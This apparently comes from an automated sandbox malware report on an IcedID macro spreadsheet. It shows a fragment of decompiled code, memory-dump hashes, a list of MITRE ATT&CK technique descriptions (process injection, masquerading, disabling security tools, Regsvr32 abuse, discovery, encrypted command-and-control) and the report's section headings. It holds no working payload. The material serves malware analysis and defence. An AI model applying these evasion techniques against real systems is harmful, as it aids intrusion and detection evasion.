					_t31 = (_t34 | _t44 | _t41) - (_t34 | _t44);
					_t47 = _t47 + _t31;
					_t49 = _t49 - 1;
				} while (_t49 != 0);
				return _t18 / _t47;
			}

0x00511e50
0x00511e50
0x00511e50
0x00511e50
0x00511e55
0x00511e5a
0x00511e5f
0x00511e60
0x00511e6b
0x00511e6b
0x00511e71
0x00511e73
0x00511e84
0x00511e86
0x00511e8a
0x00511e8e
0x00511e92
0x00511e96
0x00511e98
0x00511e9f
0x00511ea2
0x00511ea5
0x00511eab
0x00511ead
0x00511eb8
0x00511eba
0x00511ec1
0x00511ec4
0x00511ec7
0x00511ec7
0x00511ee9

Memory Dump Source

Source File: 00000004.00000002.2089851574.0000000000510000.00000040.00000001.sdmp, Offset: 00510000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2318fb796138583acd0950f01f63cac7e4af46243d00b3ebc09f9ecd2c5c3d1b
Instruction ID: a9d88d8278bcf3b12e282b3739242df6f9b3dcb8838e5a7247d717dbca92f115
Opcode Fuzzy Hash: 2318fb796138583acd0950f01f63cac7e4af46243d00b3ebc09f9ecd2c5c3d1b
Instruction Fuzzy Hash: 7901B572B14B908BDF248F36B644349B6A2F38D7C0F148535DB9C43B18DA3CD5958B04

Uniqueness

Uniqueness Score: -1.00%

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Regsvr32.exe to proxy execution of malicious code. Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including dynamic link libraries (DLLs), on Windows systems. Regsvr32.exe is also a Microsoft signed binary.
Tactics:	Defense Evasion
Data Sources:	Loaded DLLs, Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report Schedule-982347-Y6844315.xlsm

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: IcedID

Yara Overview

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Overview

System Summary:

Jbx Signature Overview

AV Detection:

Compliance:

Software Vulnerabilities:

Networking:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTP Packets

HTTPS Packets

Code Manipulations

Statistics

CPU Usage

Function 005127BC, Relevance: 3.1, APIs: 2, Instructions: 87
COMMON

Function 00512434, Relevance: 1.6, APIs: 1, Instructions: 67
COMMON

Function 00511E50, Relevance: .0, Instructions: 47
COMMON